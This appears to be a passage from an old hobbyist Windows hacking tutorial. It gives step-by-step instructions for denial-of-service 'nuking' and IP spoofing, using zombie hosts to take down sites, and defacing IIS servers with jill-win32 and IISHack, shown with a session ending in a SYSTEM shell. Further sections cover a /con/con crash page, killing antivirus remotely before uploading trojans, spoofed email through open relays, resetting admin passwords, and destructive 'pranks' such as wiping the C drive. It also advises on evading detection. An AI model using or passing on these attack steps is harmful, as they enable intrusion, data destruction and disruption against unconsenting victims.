Nuking was in the Windows 95/ NT4 days. The original WinNuke was for Windows 95. It attacked the host on port 139 (win95) and port 135 (winNT). Yes someone people still use Windows 95 and NT4, but not alot of people. If you find someone by any chance, use Superkod. I found it works best. Open up the program, type in the IP and Click NUKE. If the person is using Win95 or WinNT4, and their unpatched, their internet connection will be dropped or they will get a BSOD.
That's all very well and all, but with a program like KOD, it does not hide your IP from your attacker. If they are running a firewall, they will see where all this traffic is coming from and they will see it's YOU. So now, you need to spoof your IP address so the attacker cannot see who the attack is coming from. For Win2k/XP, I would recommend using Smurf2k, Nemesy or Jolt that was designed for attacking Win2k, but Jolt does not spoof the IP so beware, only Smurf2k and Nemesy spoofs the IP. Smurf2k uses a broadcast list, a list it uses for address to spoof from. So if you attack someone, they will see IP's attacking them that does not exist. Before you attack someone, find out what connections he has, because if he want to attack him with bandwidth, you will need more than him. So if it is an modem user with no firewall, you will be able to disconnect him yourself. If it is someone with more bandwidth than you, a firewall or a patched system, you will need BANDWITH to disconnect him. So gather around a few of your buddies, give them a DOS tool and all of you guys at the same time attack him. Make sure you run a firewall that blocks incoming IGMP, ICMP, UDP and TCP incoming connections if they start attacking back. Heck even better, infect a few hosts on a ADSL line or a corporate line with alot of bandwidth, and take down microsoft.com.
This is the part when Zombies comes in. You infect a few hosts (Zombies) and control them to do a DOS attack on someone. It works almost like a trojan which you infect their PC and take control of it.
Try Freak88 - it allows you to control a few PC's at the same time and do a DOS attack.
(7) Getting a PC name, MAC
address and user name logged on
So you would like to know someone's PC name, or their MAC address of their network card or the username that currently logged onto the PC? It can be very useful to have this info on someone. Their PC name can be their own name or company name. Their MAC address is the address of their network card, which is static, means that it can never change. Their username can also be useful if you would like to know this persons name. All of this can only be retrieved if the person has a network card installed on their PC.
In DOS prompt (Start, Run) type in " nbtstat -a IP"
EX : nbstat -a 196.35.24.15, it will show something like this :
Local Area Connection 3:
Node IpAddress: [10.10.10.22] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
PCNAME <00> UNIQUE Registered
DOMAINNAME<00> GROUP Registered
PCNAME<03> UNIQUE Registered
PCNAME<20> UNIQUE Registered
DOMAINNAME <1E> GROUP Registered
USERNAME <03> UNIQUE Registered
MAC Address = 00-22-AE-43-33-30
It will show you the PC name, domain name if it is connected to a domain and it will show the user name logged onto the PC. The MAC is static, meaning it never changes, useful for identifying someone. Your buddy attacks you, you check his IP and you do a "nbtstat" on him, and you gets his MAC address. So now if you check on his PC, and see he has got the same MAC address you know it was him attacking you.
(
IP addresses, understanding it
Everyone that connects to an network, has got a IP address. A IP address looks something like this : 80.65.123.25
Your network card has an IP and your modem has an IP address if you connect to the Internet, but both is diffident because your LAN is not part of the internet. When you connect to Internet, depending on your connection, you get a fixed ( static ) IP or a dynamic IP. Modem users gets a IP address that changed every time they reconnect to internet, Very useful if you attack people, so if you disconnect, then you get a diffident IP. If you have a ISDN or maybe ADSL connection most of the time you will get a static IP, so whenever you connect to internet you get the same IP every time. Attack someone without IP spoofing, they will be able to see it is your IP attacking them! They can then go to your ISP ( internet service provider ), check who does this IP belong to and you can get into trouble. This is where modem users are lucky, they don't have a static IP and then can go mad and attack people and so without being caught, well almost... Their ISP can still check who was using the certain IP for a certain time and what telephone number it was coming from, but its too much of a hassle for a simple DOS attack.
IP spoofing is basically when you attack someone and you use a bogus IP. a DOS attack or whatever, it attacks the target, but the target only receives data from bogus IP's. IP's that does not really exist, or it does excist but it is someone else's IP, not yours.
Every network cards has a burned in MAC address. a MAC address looks something like this : 00-40-AH-4E-E0-90, it cannot be changed - well kind of, so if you attack someone and they do a nbstat on you, get your MAC address of your network card, it is a simple way of identifying you as the attacker.
(9) IIS ( Web server/web page)
hacking
IIS is Microsoft's internet server. It is very buggy and very exploitable. Defacing a IIS server is actually very easy. Alot of system administrators does not load patches on their IIS servers so they are the people who gets defaced (hacked). Current IIS servers I will show u to hack is IIS 4/5. IIS 6 is the industry standard at the moment, but there is still alot of IIS4/5 servers online. The way IIS server are being hacked is though buffer overflows and exploits. This is when a certain code is sent to the server, the server gets confused and grants you root access to the server. In the IIS hacking download section there is alot of IIS hacking tools making it easy for anyone to hack a IIS server. Not all webservers are run on IIS, there is many other webserver software out there like Apache. We will only be dealing with IIS servers.
Firstly you have to find a IIS server. Dreamscape IISscanner is very useful. It gives you the option to scan a certain IP or an IP range. It will search and tell you if it finds any IIS servers, and which version the host is running.. Another way is to telnet to the IP on port 80. In dos prompt (Start, Run,CMD) type in : telnet 196.35.45.21 80. It will open telnet and show you what IIS the host is running. Web servers normally runs on port 80, but it can be any other specified port.
If you find a IIS server, it's time to DEFACE it
Go check on my IIS hacking page for IIS hacking programs. We will first use Jill-win32 for now. It exploits an IIS5 printer overflow. In dos prompt (Start, Run) run jill-win32. It will show you this :
iis5 remote .printer overflow.
dark spyrit <
dspyrit@beavuh.org> / beavuh labs.
usage: jill-win32 <victimHost> <victimPort> <attackerHost> <attackerPort>
An example how to use it :
jill-win32 196.65.56.32 80 196.89.65.45 69 - 196.65.56.32 is the IIS server you want to deface, port 80 is the port the server runs it IIS service on, 196.89.65.45. is your IP, and port 69 is the port TFPD32 (available from this zip file) will listen on. When you run jill-win32 it will exploit a printer overflow on the IIS server and create a backdoor on the server which will connect to port 69 on your PC, which TFPD32 listening on.
Here is a another example :
Download IISHack and do the following :
Usage: IISHack1.5 [server] [server-port] [trojan-port]
C:\send resume to
hire@eeye.com> iishack1.5.exe www.[yourowncompany].com 80 6969
IISHack Version 1.5
eEye Digital Security
http://www.eEye.comCode By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.
Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you should get a cmd prompt.
C:\> telnet www.[yourowncompany].com 6969
Trying www.[yourowncompany].com...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\WINNT\system32>whoami
NT AUTHORITY\SYSTEM
For those people who does not have a clue what's going on in here, go the script kiddie way and download the other GUI ( graphical user interface ) IIS hacking programs from my IIS page and let the program deface the web page for you. There is a few IIS tutorials in Windows hacker misc section.
(10) Crashing Win95/Win98 PC
with any access to a share
Windows 95/98 does not react well to the /con/con command. Any Windows 98/95 PC can be crashed with this /con/con exploit, but you need access to a share on the PC, any access will work.
Create a htm file with the following code in it :
<html>
<head><title>Crash!</title></head>
<body>
<a href="file://pcname/sharename/con/con">click me!</a>
</body>
</html>
The pcname, is the PCname of the PC you want to crash ( or the IP ) and the sharename is the share you got access to.When you open the htm file and click on the link, it will crash ( BSOD ) the PC.
(11) Creating undeleteable
directories remotely
Now this is something that can really create havoc!!! I tested it on Win9X and Win NT4 .Does not work on Win2k or Win XP. Beware don't try this on yourself!! Windows 9x and NT 4 has a flaw which allows an remote connection to create undeleteable, well practically undeleteable files and directories to be created anywhere on a remote machine. These files and directories can be deleted, but it takes about 2 minutes to delete through dos commands. Download NetBiosBomber, choose the target and choose which OS and you ready to makes someone's life hell. Remember if their system is update it will not work.
(12) Connecting to mIRC through
a Wingate
A wingate is like a proxy server, anyone can connect to the server (some do have usernames and passwords), and then work through the server to connect to some other server. Then it will look like you are working form that server, your identity changed. mIRC is a internet relay chat client, a chat room client. Download mIRC now !! In mIRC there is a firewall option, this is where you specify your wingate server. Click the "use firewall" option, make sure its set to socks 4 ! and put in a wingate address in the "hostname". Port should be 1080 with no username or password. Wingate list available from Cyberarmy or you can use any port scanner, or you can use Proxy finder to search for socks wingate on a subnet. Scan any IP range for hosts that's got port 1080 open. Wingates are great for IRC to keep you anonymous.
(13) Anonymous email / Email
as any address
Download RA-Anonymous email first. Then choose who u want to send to and from who u want the email to be from. For this to work you will have to find an smtp server that accepts relaying. . So in the server space put in : "smtp.mweb.co.za" - this smtp worked at the time I tested it.. and your are ready to send someone email from
billgates@microsoft.com !!
Use OPENRELAYCHECKER from my downloads page to download OPENRELAYCHECKER which you can use to search for email servers that support relaying.
(14) Resetting and cracking
Win2K or WinXP administrator
password
Resetting your Win2K admin password is easy. Boot up with a Win9X boot up disk or CD. Go to Winnt\system32\config directory. There will be a file called "SAM" Delete that file and reboot machine. Now the Administrator account password will be reset to blank ( no password ). Only works with FAT32 partitions.
For Windows XP need this file which has a few utilities you can use to reset the XP administrator password.
Then there is also a program called AdminHack which you load in a dictionary file to crack the administrator account if you have local access on the PC.
(15) Connecting to
MIRC/KAZAA/ICQ thru a
firewall that has certain ports
blocked with a SOCKS server
When you behind a firewall and MIRC, Kazaa or ICQ is blocked you can use a technique called http tunneling. Basically your program to an program running on your computer and the programs redirects the data thru HTTP. Download HTTPORT or SOCK2HTTP. It will run a SOCKS server on your PC which you can use to connect MIRC, Kazaa or ICQQ or whatever program you want to use that is blocked by the firewall. In mIRC or Kazaa go to settings and tell the program to connect to your SOCKS server. Server address is 127.0.0.1 - your local IP and socks port is port 1080.
(16) Killing programs or
processes remotely
Lets say you try and upload a trojan to someone's machine and their anti virus picks it up. Check if you can get a account on the machine with Administrator rights. If you have an account like that, you can use PSKILL and kill the anti virus program or firewall. You can basically kill any program or process running on the machine, but it must be a Win2k or XP machine. If the person is running norton anti virus the file will be something like nav32.exe. Now with pskill the command will be :
pskill \\66.33.22.11 -u administrator nav32.exe
66.33.22.11 is the IP or pc name of the victim
-u administrator is the account you have admin rights to
Nav32.exe is the program file name or process you want to kill. You can use winlogon.exe even and it will most propably give a blue screen after you killed that process.
So now you killed the anti virus or firewall and now you are ready to upload a trojan or keylogger or anything you like...
(17) Getting someone's IP and
doing a ping sweep
Download IPstealer from WindowsHacker and put in your IP, then click on Convert IP, Click on Listen and send your victim the Link to use. When they open that link it will show up in IPstealer.
If you need random IP addresses you can do a ping sweep. It scans a whole IP range and shows you which IP's are online. Download Supercan and put in a IP range. Start 80.23.23.1 to Stop 80.23.23.255 and choose "ping only" under scan type. It will scan the whole IP range and show you which IP's are online.
(18) Pranks to pull on someone
Here is a few things u can do to someone to annoy the living hell out of them
1) Blue Screen Of Death : Create a batch file "something.bat" and edit the file so it contains the following (Win9X only)
C:\Aux\Aux
or
C:\Con\Con
Now place this in the C:\Windows\Start Menu\Programs\StartUp folder, so when the pc reboots it will throw out a BSOD every time it starts up.
2) Deleting the persons whole C drive with this command : Deltree /y c:/*.*
3) Make a screen shot of the persons desktop. put that picture as their background and hide the start bar and desktop icons. With 2000 and XP, lock the PC and move the windows out of the way, just check how clever your friend really are. Or put a password one a screen saver and put the screen saver file into the startup folder. They will have to boot up into save mode to restore the screen saver.
4) A nice harmless trick, schedule something like a screen saver with a password on a PC for a certain time, sure to make someone scream.
5) Go to the windows directory and look for a file Win.ini. Edit the file and look for a line with : shell=Explorer.exe. Change this to something like YOUR PC HAS A VIRUS ON IT. When the PC gets restarted it will come up with that message and it will not boot up @ all. Look for system.ini, change the same, shell="explorer.exe to shell=". Bill Gates Hates You"
(19) Cracking a user account
locally and remotely - brute
force or dictionary attack -
Win2K and WinXP
When you need the password of a account on your local machine or on a remote machine you can either brute force or dictionary attack the account. Remember this could take from 1 minute to a few days depending on how complex the password is.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
